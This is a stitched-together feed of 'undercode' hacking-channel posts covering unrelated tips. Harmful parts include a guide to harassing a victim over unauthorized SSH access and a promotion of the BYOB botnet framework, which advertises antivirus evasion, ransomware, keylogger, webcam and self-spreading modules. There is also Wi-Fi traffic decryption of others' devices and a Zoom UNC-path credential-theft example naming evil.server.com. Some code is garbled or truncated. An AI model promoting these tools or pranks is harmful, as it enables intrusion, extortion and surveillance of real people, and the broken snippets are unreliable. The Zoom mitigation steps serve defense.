🦑NOW

10) Cron Tasks from Hell
Now we can start combining tasks and plan their automatic launch. We can check if there are any existing jobs in crontab with the -l flag, and then add a new job with the -e flag.

crontab -l
crontab -e
11) In the configuration window that opens, you can add a task for execution every 60 seconds according to the following formula.


12) In order for the computer to beep every 60 seconds, we can add this record and then press ctrl x and y to save the file.

* * * * * beep -f 300.7 -r 10 -d 50 -l 400

13) As soon as the file is saved, the computer will emit a sound signal with the given parameters every 60 seconds.

14) Completing Custom Tasks
If you have access to someone else’s computer using SSH, you can turn off any running process. This will lead to a sudden stop of the used application, and accordingly, the user will not be able to effectively use the computer. To find the process ID, we can use the top or htop commands . If you do not have htop installed , you can do this with the command below.

apt install htop
top
Tasks: 219 total, 1 running, 178 sleeping, 0 stopped, 0 zombie
%Cpu(s): 3.0 us, 0.4 sy, 0.0 ni, 95.6 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 4968836 total, 1431244 free, 1104324 used, 2433268 buff/cache
KiB Swap: 5138428 total, 5138428 free, 0 used. 3367804 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
31906 root 20 0 0 0 0 I 6.2 0.0 0:00.59 kworker/u16:1
32560 toor 20 0 41928 3880 3192 R 6.2 0.1 0:00.02 top
1 root 20 0 160212 9592 6816 S 0.0 0.2 0:02.35 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.01 kthreadd
4 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/0:0H
6 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 mm_percpu_wq
7 root 20 0 0 0 0 S 0.0 0.0 0:01.33 ksoftirqd/0
8 root 20 0 0 0 0 I 0.0 0.0 0:09.13 rcu_sched
9 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_bh
10 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
11 root rt 0 0 0 0 S 0.0 0.0 0:00.03 watchdog/0
12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0
13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1
14 root rt 0 0 0 0 S 0.0 0.0 0:00.03 watchdog/1

15) If I want to kill the process from above, I just take the PID and run the following command.

16) kill PID#
In the above example, I would run kill 32560 to terminate the top running process.

17) Putting It All Together
Now let's combine all that we have learned so that the end user gets a “vivid impression” from using their PC. Take a random beep and combine it with some bash commands to create many Firefox browser windows that open every 60 seconds and go to “Never Gonna Give You Up.”

for i in {1..10}; do beep -f 4000 -D 500 -l 1000 -r 10 & firefox -new-window

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FULL 2020 SSH HACKING WHY :

>SSH access lets you do anything
Doing harm through SSH or bullying is not something you will use daily, but knowing these processes is very useful for social engineering. Do not abuse the knowledge gained as the victim can really be very scared. It is not legal to access someone else's computer!
written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST 2020 SFTP and FTPS servers- recommended by undercode
instagram.com/undercodetESTING

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) SolarWinds SFTP / SCP Server . Secure file transfer utility for Windows from a leader in the development segment of network management tools.

2)FileZilla FTPS . Reliable free FTP server that runs on Windows, but can receive files from other operating systems.

3) IIS FTPS Server . Windows Secure FTP Server, which is built into Windows Server and protects file transfers using encryption.

4) Free FTP . A lightweight utility on Windows that provides secure file transfer as an external tool or as a system service.

5) Syncplify.me SFTP . Paid secure FTP utility for Windows. There is a free version to evaluate the possibilities.

6) Rebex Tiny SFTP Server . A secure file transfer system that can be embedded in software using .NET libraries.

7) CrushFTP . A simple and attractive FTP utility for Windows. A free trial period of 30 days is available for the server, the client is always free.

8) Cornerstone MFT . Managed File Transfer (MFT) is a paid system for transferring files to Windows, there is a 30-day trial period.

9) Globalscape SFTP . A number of options for secure file transfer under the general name Enhanced File Transfer with the ability to work in the cloud or install on Windows. This is a paid tool with a free trial.

10) Titan FTP . FTP utility includes FTPS and SFTP for secure file transfers and runs on Windows Server 2008 and 2012. This is a paid service, there is a 20-day trial period.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Make an information release functionPHP by undercode :

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

CREATE TABLE jb_administrators (
administratorsID int(10) unsigned NOT NULL auto_increment,
userID mediumint(6) unsigned NOT NULL default '0',
administratorsGroupID int(10) unsigned NOT NULL default '0',
administratorsName varchar(50) NOT NULL default '',
password varchar(32) NOT NULL default '',
email varchar(50) NOT NULL default '',
ipAddress varchar(32) NOT NULL default '',
isAdministrators enum('y','n') NOT NULL default 'n',
orderByID int(10) unsigned NOT NULL default '0',
createDate bigint(14) unsigned NOT NULL default '0',
PRIMARY KEY (administratorsID)
) TYPE = MyISAM AUTO_INCREMENT = 2;

#
# Export table data` jb_administrators`
#

INSERT INTO jb_administrators VALUES (1, 1, 1, 'sky', 'sky', '', '', 'n', 0, 0);
# ------------------------------------- -------------------

#
structure # jb_administratorsoption` table `

#

CREATE TABLE jb_administratorsoption (
administratorsOptionID int (8) NOT NULL auto_increment,
userID mediumint (6) unsigned NOT NULL default '0',
optionFieldName varchar (50) NOT NULL default '' ,
length tinyint(2) unsigned NOT NULL default '40',
rows tinyint(2) unsigned NOT NULL default '4',
types varchar(10) NOT NULL default '',
isPublic enum('y','n') NOT NULL default 'y',
orderByID int(8) unsigned NOT NULL default '0',
PRIMARY KEY (administratorsOptionID)
) TYPE=MyISAM AUTO_INCREMENT=10 ;

#
jb_administratorsoption
#

INSERT INTO jb_administratorsoption VALUES (8, 1, '57777', 40, 50, 'text', 'y', 8);
INSERT INTO jb_administratorsoption VALUES (9, 1,', 40, 0, 'text', 'y', 9); jb_administratorsoptionlist #
# ------------------------------------------------- -------
🦑 CREATE TABLE jb_administratorsoptionlist (
administratorsOptionListID int(12) unsigned NOT NULL auto_increment,
userID mediumint(6) unsigned NOT NULL default '0',
administratorsID int(10) unsigned NOT NULL default '0',
administratorsOptionID int(8) unsigned NOT NULL default '0',
value text NOT NULL,
createDate int(14) unsigned NOT NULL default '0',
PRIMARY KEY (administratorsOptionListID)
) TYPE=MyISAM AUTO_INCREMENT=168 ;

# <
written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Most active malware in this month the cloudnet.exe :
>< ransoware & backdoor
twitter.com/undercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

How to remove this generated malware:

1) Check Windows Defender for status (On/OFF), remove all files from exclude list.

2) Turn on PUP protection in Windows Defender to protect from more potentially unwanted apps/programs(if using it as your antivirus):

3) https://answers.microsoft.com/en-us/protect/forum/protect_defender-protect_scanning-windows_10/windows-defender-not-detecting-known-adware/9cfe114b-8d1b-42a2-8268-34dc3acf9390?auth=1

->
4) PUA Protection is disabled by default and needs to be enabled. This is easy with PowerShell – just run this command line at the elevated PowerShell Prompt:
Set-MpPreference -PUAProtection 1

5) Then confirm that the value was reset by returning the current state for PUAProtection:

$Preferences = Get-MpPreference

$Preferences.PUAProtection

---------------------------------------------------

6) Also, Remove all add-ons/extensions in all browsers, and reset browsers....

7) Make sure your data is backed up with OneDrive, and/or FileHistory and/or something else. Consider a Windows10 Reset or Clean Install of Win10, if you can not get it resolved with scans..


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to track traffic from a smartphone using Wireshark part 1 full
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) Download Wireshark and connect to a Wi-Fi network
Download and install Wireshark if you haven’t already installed it. Connect to the desired Wi-Fi network. If you intend to use the PSK instead of the network key, you need to calculate it using the Wireshark tool , since you will not be able to go online during the capture, depending on your card.

2) When you downloaded Wireshark, launch the application and look at the network interfaces. Before you start capturing, you need to set a number of parameters for the card to work in the correct mode.

3) Configuring Wireshark to Capture
In the Wireshark menu, click on the gear icon called “Capture Options”.
>The Capture Interfaces window opens:

4) Start network capture and scan EAPOL packets
If you have not connected to the network where the target device is located, you will not be able to see the packets, because you will be in another random channel. Wireshark cannot change the channel on which the wireless network adapter works, so you won’t get the information you need.

5) Decrypt traffic using the network PSK
After confirming the establishment of communication, you can decrypt the information. To do this, add a network password or PSK. Open the Wireshark pull-down menu and select the "Settings" command. Click on Protocols here.

6) Select IEEE 802.11 and click Enable Decryption. To add a network key, click “Edit” next to the encryption keys. A window will open for adding passwords and PSK.

7) Select “wpa-psk” from the menu and insert your key. Press Tab and OK.
8) After that, click OK in the Settings menu and Wireshark will re-scan all captured packets, trying to decrypt them. For many reasons, this may not work. In most cases, attempts succeeded if you provided a good handshake (EAPOL) and the transition between using a network password and PSK. If this works, you can continue to analyze traffic and choose which applications to use.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PART 2 How to track traffic from a smartphone using Wireshark
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

A) Scan DNS & HTTP packets
By eliminating traffic protection, Wireshark can decrypt it and tell which devices are currently in the Wi-Fi network.

1) DNS queries
To see the packages we are interested in, let's start with DNS queries. With their help, applications verify that the IP addresses to which they should connect have not changed. They are directed to domain names, which usually contain the name of the application. From this, you can understand which applications are running on the smartphone.

2) To see application requests, we will use two capture filters, dns and http. This allows you to see the most obvious traces of applications on a Wi-Fi network. First, type dns in the filter and press enter. If this does not work, try several times in a row to switch in real time between the password and the PSK. Perhaps after that everything will work.

>Using Signal is a good idea, but it’s even better to use a VPN. Why? Just launching the Signal application creates the following traces, allowing you to understand that a person is chatting with someone in an encrypted program.

B ) HTTP packets
Next, we use the http filter to look at insecure web requests. Capture filters contain information like useragent, from which you can learn about the type of connecting device. We click on the packages and open the tab “Hypertext Transfer Protocol”.

1) In this example, you can see insecure HTTP requests to the chat server. What is it? Studying the package and domain name gives the answer that this is a WeChat application. It is installed on this smartphone and communication is not fully encrypted.

2) If you want to see all the decrypted data, you can click on the menu tab called “Statistics” and see the allowed addresses. This will show all the decrypted domains during the capture. This should be a long list of services to which the device connects through applications.

3) Wireshark makes it harder to trust Wi-Fi networks
This kind of monitoring seems intrusive, but you need to remember that your Internet provider saves the same information and can sell it or transfer it to law enforcement agencies upon request. If you want to protect yourself from such provider actions, you can use VPN services to hide local traffic through strong encryption. If you need to hide especially during certain actions, it is advisable to use mobile traffic instead of Wi-Fi.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Is your smartphone slower? Use the built-in Android memory manager:
>Android device owners tried to solve this problem with the help of RAM managers. These are applications that close other programs to free memory. Unfortunately, there was more harm than good from them. These managers consumed system resources themselves, and other applications re-started after they were closed. Android now has a built-in memory manager that will free up memory correctly.
fb.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) Unlock settings for developers
The RAM manager is located in the settings menu for Android developers. By default, this menu is hidden. You need to go to the settings in the " About the phone " section and click on the build number seven times. After that, go to the main settings menu and the “ For Developers ” options will appear

2) Management of random access memory
Go to the settings for developers. In the latest versions of Android, they can be located in the Settings > System > Advanced Settings section . Inside, select " Running Services ", which should be located at the top of the list.

Now you will see active services. Services are application components that run in the background for a long time without a user interface. For example, services process RCS messages. Usually it works perfectly without the need to interact with these services or even know about their existence. Sometimes problems may arise if the amount of RAM is limited.

3) you can stop any service if there are problems in its operation. By default, applications are divided by the amount of consumed RAM in descending order. If the machine is slow, it is not recommended to stop all processes in a row. Applications will restart in a second, so this makes no sense. Instead, you need to look at the data on memory consumption and decide which applications to get rid of.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Best 2020 working apps for instagram followers :
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋

1) Turbo Followers for Instagram Free Android 4.4, iOS, macOS 4.7
https://play.google.com/store/apps/details?id=get.instagram.followers.unfollowers&hl=en

2) Followers & unfollowers Free Android 4.0+ 4.6
https://play.google.com/store/apps/details?id=get.instagram.followers.unfollowers&hl=en

3) Get Followers UP Free Android 4.4+, iOS
https://play.google.com/store/apps/details?id=com.fancyphoto.maker&hl=en

4) Get Super Followers - NewCam Free & paid premiums Android 4.4+, iOS, macOS 4.8
https://apkplz.net/app/com.retro.polaroid

5) Free Followers And Likes Free Android 4.0.3 +
https://play.google.com/store/apps/details?id=com.paca.likes.work&hl=en

6) Get Likes & Followers Free 2019 Free Android 4.0.3, iOS 4.3
https://apkpure.com/followers-and-likes-analyzer-for-instagram/get.free.real.followers.likes.stats

7) Followers and Likes Analyzer Free Android 4.1 and up 4.7
https://play.google.com/store/apps/details?id=get.free.real.followers.likes.stats&hl=en

8) InsEnGage Free Android 4.1+ macOS, iOS 4.8
https://play.google.com/store/apps/details?id=com.likeigviewers&hl=en

9) Get Followers & Likes Free Android 4.1+ 4.2
https://play.google.com/store/apps/details?id=com.freefollowers.freelikes&hl=en

10) Real Followers & Get Likes for Instagram Free Android 4.4+ 4.5
https://play.google.com/store/apps/details?id=com.appgen.likeandfollower&hl=en

11) Crowdfire for Instagram Growth Free + paid premiums Android 4.2+ iOS, macOS 3.5
https://play.google.com/store/apps/details?id=com.justunfollow.android&hl=en

12) Follower Insight for Instagram Free Android 4.2+ 2.5
https://play.google.com/store/apps/details?id=com.skyfireapps.followersinsightapp&hl=en

13) Real Followers For Instagram Free Android4.4+, iOS, macOS 4.2
https://play.google.com/store/apps/details?id=like.follow.tag&hl=en

14) Get Real Instagram Followers & Likes- Fame Club Free & paid premiums Android 5.0+ iOS, macOS 4.0
https://play.google.com/store/apps/details?id=com.lkgn.app&hl=en

15) InstaInfluencer Free Android 4.1+ 4.7
https://play.google.com/store/apps/details?id=get.free.real.instant.followers&hl=en

🦑apps tested by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated 2020How Build Your Own Botnet Malware :
It is designed to allow developers to easily implement their own code and add cool new features without having to write a RAT (Remote Administration Tool) or a C2 (Command & Control server) from scratch.

> The RAT's key feature is that arbitrary code/files can be remotely loaded into memory from the C2 and executed on the target machine without writing anything to the disk support python 2 & 3
twitter.com/undercodenews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋


🦑 How to build ?

1) Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules

2) Remote Imports: remotely import third-party packages from the server without writing them to the disk or downloading/installing them
Nothing Written To The Disk: clients never write anything to the disk - not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process

3) Zero Dependencies (Not Even Python Itself): client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host

4) Add New Features With Just 1 Click: any python script, module, or package you copy to the ./byob/modules/ directory automatically becomes remotely importable & directly usable by every client while your command & control server is running

5) Write Your Own Modules: a basic module template is provided in ./byob/modules/ directory to make writing your own modules a straight-forward, hassle-free process

6) Run Unlimited Modules Without Bloating File Size: use remote imports to add unlimited features without adding a single byte to the client's file size

7)Fully Updatable: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed

8)Platform Independent: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS)

9)Bypass Firewalls: clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections

10) Counter-Measure Against Antivirus: avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning

11) Encrypt Payloads To Prevent Analysis: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it

12) Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected

🦑MODULES :
1) Post-exploitation modules that are remotely importable by clients

2) Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered

3) Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop

4) Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam

5) Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment

6) Outlook (byob.modules.outlook): read/search/upload emails from the local Outlook client

7)Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file

8)Persistence (byob.modules.persistence): establish persistence on the host machine using 5 different methods

9)Phone (byob.modules.phone): read/search/upload text messages from the client smartphone

10)Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges

> build malware part 2

11)Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports

12) Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host

13) iCloud (byob.modules.icloud): check for logged in iCloud account on macOS

14) Spreader (byob.modules.spreader): spread client to other hosts via emails disguised as a plugin update

15) Miner (byob.modules.miner): run a cryptocurrency miner in the background (supports Bitcoin & Litecoi

>https://github.com/malwaredllc/byob check out this code-modules

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Vulnerability in Zoom client could reveal Windows login credentials to attackers
t.me/undercodeTesting

1) Recently, the Zoom client for Windows has revealed a security vulnerability vulnerable to NUC path injection attacks. As an audio and video conference application, Zoom also allows users to communicate with each other by sending text messages on the chat interface. However, foreign media Bleeping Computer pointed out that an attacker could use the vulnerability of the chat module to steal the Windows login credentials of the user who clicked the relevant link.

2) When sending a chat message, all sent URLs will be converted so that other members of the group can click and then open the webpage in the default browser.

> However, security researcher @undercodeTesting found that the Zoom client turned the Windows network UNC path into a clickable link in the chat message.

> both the regular URL and the NUC path (\\ evil.server.com \ images \ cat.jpg) are converted into clickable links in the chat message

3) f the user clicks the UNC path link, Windows will attempt to connect to the remote site using the SMB file sharing protocol to open the cat.jpg file in the remote path.

By default, Windows will send the user's login name and NTLM password hash, but a less experienced attacker can use a free tool like Hashcat to do the reverse.

4) Security researcher Matthew Hickey (@ HackerFantastic) found that it can be successfully injected in Zoom and can be quickly cracked with the help of current civilian GPUs and CPUs.

In addition to stealing Windows login credentials, Hickey also revealed to Bleeping Computer that by clicking on the link, UNC injection is also suitable for starting programs on the local computer (such as the CMD command prompt).

5) Fortunately, Windows will prompt you whether to allow the program to run before it is executed. To plug this vulnerability, Zoom must prevent the UNC path translation feature of the Windows client (block some clickable hyperlinks).

It is reported that Hickey has sent a notice to Zoom official on Twitter about the security breach, but it is not clear what action the company has taken.

6) Security-conscious customers can restrict NTLM communication to remote servers through Group Policy before the official patch release (refer to the following operations):

Computer Configuration-> Windows Settings-> Security Settings-> Local Policies-> Security Options-> Network Security: Restrict NTLM-> NTLM traffic to remote servers (then all configured to deny).

7)Note that if you configure the above Group Policy on a computer that has joined the relevant domain, you may encounter problems when trying to access the share.

For Windows 10 Home users who do not have access to Group Policy settings, you can also use the Registry Editor to complete the relevant restrictions (dword is set to 2):

[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ MSV1_0] "RestrictSendingNTLMTraffic" = dword: 00000002

8) To create this key correctly, Windows users remember to launch Registry Editor as an administrator.

If in the future it is necessary to restore the default Windows behavior of sending NTLM credentials, simply delete the corresponding RestrictSendingNTLMTraffic key.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁